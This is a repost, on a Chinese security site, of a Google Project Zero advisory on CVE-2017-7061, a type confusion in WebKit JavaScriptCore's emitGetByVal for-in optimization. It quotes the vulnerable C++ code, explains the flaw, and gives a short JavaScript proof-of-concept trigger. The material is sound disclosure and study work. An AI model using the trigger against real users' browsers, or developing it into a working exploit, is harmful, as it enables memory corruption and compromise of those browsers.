首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WebKit JSC BytecodeGenerator::emitGetByVal Incorrect Optimization
来源:Google Security Research 作者:lokihardt 发布时间:2017-09-12  
 WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal 

CVE-2017-7061


Let's start with JS code.

let o = {};
for (let i in {xx: 0}) {
    o[i]; <<-------- (a)
}

When the code generator meets (a), it will call BytecodeGenerator::emitGetByVal.

Here's the code of BytecodeGenerator::emitGetByVal.

RegisterID* BytecodeGenerator::emitGetByVal(RegisterID* dst, RegisterID* base, RegisterID* property)
{
    for (size_t i = m_forInContextStack.size(); i > 0; i--) {
        ForInContext& context = m_forInContextStack[i - 1].get();
        if (context.local() != property)
            continue;

        if (!context.isValid())
            break;

        if (context.type() == ForInContext::IndexedForInContextType) {
            property = static_cast<IndexedForInContext&>(context).index();
            break;
        }

        ASSERT(context.type() == ForInContext::StructureForInContextType);
        StructureForInContext& structureContext = static_cast<StructureForInContext&>(context);
        UnlinkedValueProfile profile = emitProfiledOpcode(op_get_direct_pname);
        instructions().append(kill(dst));
        instructions().append(base->index());
        instructions().append(property->index());
        instructions().append(structureContext.index()->index());
        instructions().append(structureContext.enumerator()->index());
        instructions().append(profile);
        return dst;
    }

    UnlinkedArrayProfile arrayProfile = newArrayProfile();
    UnlinkedValueProfile profile = emitProfiledOpcode(op_get_by_val);
    instructions().append(kill(dst));
    instructions().append(base->index());
    instructions().append(property->index());
    instructions().append(arrayProfile);
    instructions().append(profile);
    return dst;
}

The method uses op_get_by_val to handle expressions like "o[i]". But, there is a fast path, which uses op_get_direct_pname, for when the index variable is a string. op_get_direct_pname is designed for a string index only. So if other types are used as indexes, it will cause type confusions. In the above JS code, it's very clear that "i" will be a string("xx") semantically. Therefore, it will use op_get_direct_pname to handle it.

Here's another example.

let o = {};
for (let i in {xx: 0}) {
    o[i]; <<-------- (a)
    i = 0x123456; <<-------- (b)
    o[i]; <<-------- (c)
}

In this case, it will use op_get_direct_pname at (a). And at (b), since the index variable "i" is replaced, the invalidate method of the ForInContext object that makes "context.isValid()" return false is called. So, op_get_by_val will be used at (c).

But the problem is that it can't properly handle the following case which cause a type confusion.

let o = {};
for (let i in {xx: 0}) {
    for (let j = 0; j < 2; j++) {
        o[i];  // When j == 1, op_get_direct_pname was already emitted, but i is not a string anymore.
        i = 0;
    }
}

PoC:
let o = {};
for (let i in {xx: 0}) {
    for (let j = 0; j < 2; j++) {
        o[i];
        i = new Uint32Array([0, 1, 0x777777, 0, 0]);
    }
}



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·tcprewrite 3.4.4 Buffer Overfl
·Jungo DriverWizard WinDriver 1
·MobaXtrem 10.4 Remote Code Exe
·Astaro Security Gateway 7 - Re
·Docker Daemon Unprotected TCP
·D-Link DIR8xx Routers - Leak C
·D-Link 850L XSS / Backdoor / C
·D-Link DIR8xx Routers - Root R
·Apache Struts 2 REST Plugin XS
·D-Link DIR8xx Routers - Local
·PlugX Controller Stack Overflo
·Netdecision 5.8.2 - Local Priv
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved